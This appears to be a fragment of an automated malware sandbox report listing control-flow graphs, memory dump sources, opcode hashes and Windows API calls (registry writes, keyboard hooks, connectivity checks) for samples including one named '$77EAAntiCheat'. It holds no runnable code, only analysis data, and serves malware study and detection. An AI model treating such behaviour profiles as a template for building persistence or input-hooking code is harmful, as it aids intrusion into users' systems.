                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:33.3%
                                                          Total number of Nodes:9
                                                          Total number of Limit Nodes:0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 397 7ff848e97e09-7ff848e97ecd NtSetValueKey 401 7ff848e97ed5-7ff848e97ef2 397->401 402 7ff848e97ecf 397->402 402->401
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2080595939.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848e90000_Xyq6rvzLJs.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID:
                                                          • API String ID: 3702945584-0
                                                          • Opcode ID: faf26a4879b0f2b8650d4e048be8f0ed761a8ab5ba73a899b5da15fe41052332
                                                          • Instruction ID: f82a1b8fa749bf4a905a68e6b9eb62d4ba2acbe9abc780baa58a20367cc8ee09
                                                          • Opcode Fuzzy Hash: faf26a4879b0f2b8650d4e048be8f0ed761a8ab5ba73a899b5da15fe41052332
                                                          • Instruction Fuzzy Hash: B431C53190CA4C8FDB58EF58D849AE9BBF0FBA9321F14416FD049D3652C770A8458B91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 548 7ff848e960c2-7ff848e960cf 549 7ff848e960d1-7ff848e960d9 548->549 550 7ff848e960da-7ff848e961a7 548->550 549->550 554 7ff848e96213 550->554 555 7ff848e961a9-7ff848e961b2 550->555 556 7ff848e96215-7ff848e9623a 554->556 555->554 557 7ff848e961b4-7ff848e961c0 555->557 564 7ff848e962a6 556->564 565 7ff848e9623c-7ff848e96245 556->565 558 7ff848e961c2-7ff848e961d4 557->558 559 7ff848e961f9-7ff848e96211 557->559 561 7ff848e961d6 558->561 562 7ff848e961d8-7ff848e961eb 558->562 559->556 561->562 562->562 563 7ff848e961ed-7ff848e961f5 562->563 563->559 567 7ff848e962a8-7ff848e962cd 564->567 565->564 566 7ff848e96247-7ff848e96253 565->566 568 7ff848e96255-7ff848e96267 566->568 569 7ff848e9628c-7ff848e962a4 566->569 573 7ff848e9633b 567->573 574 7ff848e962cf-7ff848e962d9 567->574 571 7ff848e96269 568->571 572 7ff848e9626b-7ff848e9627e 568->572 569->567 571->572 572->572 575 7ff848e96280-7ff848e96288 572->575 577 7ff848e9633d-7ff848e9636b 573->577 574->573 576 7ff848e962db-7ff848e962e8 574->576 575->569 578 7ff848e96321-7ff848e96339 576->578 579 7ff848e962ea-7ff848e962fc 576->579 584 7ff848e963db 577->584 585 7ff848e9636d-7ff848e96378 577->585 578->577 580 7ff848e96300-7ff848e96313 579->580 581 7ff848e962fe 579->581 580->580 583 7ff848e96315-7ff848e9631d 580->583 581->580 583->578 586 7ff848e963dd-7ff848e964b5 584->586 585->584 587 7ff848e9637a-7ff848e96388 585->587 597 7ff848e964bb-7ff848e964ca 586->597 588 7ff848e963c1-7ff848e963d9 587->588 589 7ff848e9638a-7ff848e9639c 587->589 588->586 590 7ff848e963a0-7ff848e963b3 589->590 591 7ff848e9639e 589->591 590->590 593 7ff848e963b5-7ff848e963bd 590->593 591->590 593->588 598 7ff848e964d2-7ff848e96534 call 7ff848e96550 597->598 599 7ff848e964cc 597->599 606 7ff848e96536 598->606 607 7ff848e9653b-7ff848e9654f 598->607 599->598 606->607
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2080595939.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848e90000_Xyq6rvzLJs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c952ce7b49cb9dc21b14ec114b9599873e3c7fc6191c484ba97f9f3cfb1c6529
                                                          • Instruction ID: b4a30665bafcc8f0ee01ab34c42cb2b7382ea76abe3231d9093ae1b77503499c
                                                          • Opcode Fuzzy Hash: c952ce7b49cb9dc21b14ec114b9599873e3c7fc6191c484ba97f9f3cfb1c6529
                                                          • Instruction Fuzzy Hash: 7AE1A23090CA8E8FEBA8EF68C8557E977D1FF54350F14426EE84DC72A1DB74A9448B81

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 386 7ff848e97c29-7ff848e97c35 387 7ff848e97c37 386->387 388 7ff848e97c39-7ff848e97c76 386->388 387->388 389 7ff848e97c79-7ff848e97cc6 387->389 388->389 393 7ff848e97cd0-7ff848e97d18 RegOpenKeyExW 389->393 394 7ff848e97cc8-7ff848e97ccd 389->394 395 7ff848e97d20-7ff848e97d3f 393->395 396 7ff848e97d1a 393->396 394->393 396->395
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2080595939.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848e90000_Xyq6rvzLJs.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: f99ab89d10caa347c1ff7aea4eb898bd9b511b8ff009c9c1997e4970b7f7ab51
                                                          • Instruction ID: 5662d76afd8ef360bae10f974cccef96623f7f3fc2c563b469bb5c9fa7291291
                                                          • Opcode Fuzzy Hash: f99ab89d10caa347c1ff7aea4eb898bd9b511b8ff009c9c1997e4970b7f7ab51
                                                          • Instruction Fuzzy Hash: 3C31B17191CB489FDB58EF9C98456F97BE0FB99315F00426FE089D3242CB70A849CB96

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 403 7ff848e96820-7ff848e96827 404 7ff848e96832-7ff848e968d1 InternetGetConnectedState 403->404 405 7ff848e96829-7ff848e96831 403->405 409 7ff848e968d3 404->409 410 7ff848e968d9-7ff848e96900 404->410 405->404 409->410
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2080595939.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848e90000_Xyq6rvzLJs.jbxd
                                                          Similarity
                                                          • API ID: ConnectedInternetState
                                                          • String ID:
                                                          • API String ID: 97057780-0
                                                          • Opcode ID: be39ae8c33b09bf0bad5ff150295312687c4f7cfa83f48c3a85178f87a6f3764
                                                          • Instruction ID: ffd3b7e3fc3d7f414ee93e36c7538a8548d8ecccebd81829997072b836140092
                                                          • Opcode Fuzzy Hash: be39ae8c33b09bf0bad5ff150295312687c4f7cfa83f48c3a85178f87a6f3764
                                                          • Instruction Fuzzy Hash: 3931F13190CA4C8FDB58EFA89849BE97BE1EB66321F04016FD449C3292DB74A845CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2080595939.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848e90000_Xyq6rvzLJs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bcf73bd80ecdb9a7ae13f8024c683135080eb0f9bd7690bf9c12e76f45673de9
                                                          • Instruction ID: faf9c4a7d9b4a88e4df88e57ef359448293ce4f177f91512b6e106ef1e7cb791
                                                          • Opcode Fuzzy Hash: bcf73bd80ecdb9a7ae13f8024c683135080eb0f9bd7690bf9c12e76f45673de9
                                                          • Instruction Fuzzy Hash: 19F1B43090CA8D8FEBA8EF28C8557E97BE1FF54351F04426EE84DC7291DB7499458B82

                                                          Execution Graph

                                                          Execution Coverage:19.7%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:6
                                                          Total number of Limit Nodes:0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 365 7ff848e7a1c8-7ff848e7a1cf 366 7ff848e7a1da-7ff848e7a24d 365->366 367 7ff848e7a1d1-7ff848e7a1d9 365->367 371 7ff848e7a2d9-7ff848e7a2dd 366->371 372 7ff848e7a253-7ff848e7a260 366->372 367->366 373 7ff848e7a262-7ff848e7a29f SetWindowsHookExW 371->373 372->373 375 7ff848e7a2a7-7ff848e7a2d8 373->375 376 7ff848e7a2a1 373->376 376->375
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3301403565.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_7ff848e70000_$77EAAntiCheat.jbxd
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: d05255b4fec7aae02c13177155c22e708877907f66f9a202659d776a28dc4193
                                                          • Instruction ID: fe3cf67132049bd9f9c16d7f465f4736912411d93ec4fc85f6a83dd92df4ce93
                                                          • Opcode Fuzzy Hash: d05255b4fec7aae02c13177155c22e708877907f66f9a202659d776a28dc4193
                                                          • Instruction Fuzzy Hash: BD41F63191CA4D8FDB58EB68D8466F97BE1FB59361F00023EE009C3292DF75A8528B85

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 379 7ff848e76820-7ff848e76827 380 7ff848e76829-7ff848e76831 379->380 381 7ff848e76832-7ff848e768d1 InternetGetConnectedState 379->381 380->381 385 7ff848e768d9-7ff848e76900 381->385 386 7ff848e768d3 381->386 386->385
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.3301403565.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_7ff848e70000_$77EAAntiCheat.jbxd
                                                          Similarity
                                                          • API ID: ConnectedInternetState
                                                          • String ID:
                                                          • API String ID: 97057780-0
                                                          • Opcode ID: 7f20f700a696d67296bbee368427670194247ce561cea84d64d07d6bba260767
                                                          • Instruction ID: 0d07142be9d678cf7dfba3c50a91fe2012276255ba66ec12bd8ca0f0d44c1a0f
                                                          • Opcode Fuzzy Hash: 7f20f700a696d67296bbee368427670194247ce561cea84d64d07d6bba260767
                                                          • Instruction Fuzzy Hash: 3631F33090CA4C8FEB58EFA898457E97BE1EB56321F04016FD049C3192DB74A856CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2141403811.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_7ff848e80000_$77EAAntiCheat.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: cBM_^
                                                          • API String ID: 0-1770416534
                                                          • Opcode ID: 8451b11e5b3af26f371d62a0d0095785bbafb54bcadb489ad6c1b9e81347dfc7
                                                          • Instruction ID: c3efd8d7ca4a5d1cdfe0a549559451dfb818d3f2599e2033011004d0d1a9bb79
                                                          • Opcode Fuzzy Hash: 8451b11e5b3af26f371d62a0d0095785bbafb54bcadb489ad6c1b9e81347dfc7
                                                          • Instruction Fuzzy Hash: BB51A020E1DA5A4EE7A9B738805A2BE76D0FF59384F8405B9D00EC31D3CF3DA8418765
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2141403811.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_7ff848e80000_$77EAAntiCheat.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c4b0a77109108936fd8d3c4afd04b723f3293231f840fbd4545ebe121bea270d
                                                          • Instruction ID: b217b5d4736da5f7a52043e1a9d98631ca62e23ea01b564e627b2186b0ebdc0e
                                                          • Opcode Fuzzy Hash: c4b0a77109108936fd8d3c4afd04b723f3293231f840fbd4545ebe121bea270d
                                                          • Instruction Fuzzy Hash: 21910420A1DA8A5FE796F77C84696B97BE1FF4A210B4500FAE44DC72A7CD2C9C01CB11
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2141403811.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_7ff848e80000_$77EAAntiCheat.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56096fa720adca7657a997b21025c60907477362e5f93562e55db2745542aebe
                                                          • Instruction ID: 5bbc6bfa9e3c2897421b22ec3254c6a0caeeeb962e51102cdb720f70c0df74c6
                                                          • Opcode Fuzzy Hash: 56096fa720adca7657a997b21025c60907477362e5f93562e55db2745542aebe
                                                          • Instruction Fuzzy Hash: 0A71C230A0C9899FDB89FB6CD455BAC7BE1FF99350F4401BAE04DC3292CE29AC468751
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2141403811.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_7ff848e80000_$77EAAntiCheat.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cecbfacf599fcd0f7a551186a68b085a7006465cc1d63232accc5a8e199e6864
                                                          • Instruction ID: 2207df3b83aafbe8cd077fc6269c7f0857816113c311a89a82e330d0cd9b4a6e
                                                          • Opcode Fuzzy Hash: cecbfacf599fcd0f7a551186a68b085a7006465cc1d63232accc5a8e199e6864
                                                          • Instruction Fuzzy Hash: 1A618C30A1C9499FDB88FB6CD445BACBBE2FF99350F440179E00ED3292DE25AC468745
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2141403811.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_7ff848e80000_$77EAAntiCheat.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b7e05faeb15d294b0b41f046d883371369da5dafeb4b8fb92cacf7260c254623
                                                          • Instruction ID: f0cf42088e896791429ea9ce572808a4486208f4dc596fc635688652af734231
                                                          • Opcode Fuzzy Hash: b7e05faeb15d294b0b41f046d883371369da5dafeb4b8fb92cacf7260c254623
                                                          • Instruction Fuzzy Hash: 4A418420A1D98E9FFB94FB6884596FD7BB1FF89250F8441B5D009C3396DE386801C7A6
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2141403811.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_7ff848e80000_$77EAAntiCheat.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d279e1d207e353b8692f6c4d23ca1df0e393fdeffc4737cd71d5b8330b2e363d
                                                          • Instruction ID: 99ee9fd070d7921cefeebf5563eba72e0f3f83e26b4017082f6f7f5363bfd53d
                                                          • Opcode Fuzzy Hash: d279e1d207e353b8692f6c4d23ca1df0e393fdeffc4737cd71d5b8330b2e363d
                                                          • Instruction Fuzzy Hash: 9D019C3190C6944FF385B338681A4FA3FD0EF813A0F4806BBE448CB0A3DD2D59828396
                                                          Memory Dump Source
                                                          • Source File: 00000017.00000002.2141403811.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_23_2_7ff848e80000_$77EAAntiCheat.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1d1fa83305aba11d3dafa1baca2b578e6861b3a9b3d44432441c7ba5bd1009f
                                                          • Instruction ID: 1691b837fd6ebf5d10ab1fc57eb35f0f7a04c9393fa0f5a7d3b8fbc7f46166ac
                                                          • Opcode Fuzzy Hash: f1d1fa83305aba11d3dafa1baca2b578e6861b3a9b3d44432441c7ba5bd1009f
                                                          • Instruction Fuzzy Hash: EEE0683290DA0C1EEA54EA59AC06DEA3FA8EBC7238F00001EE48DC3152F5226823C355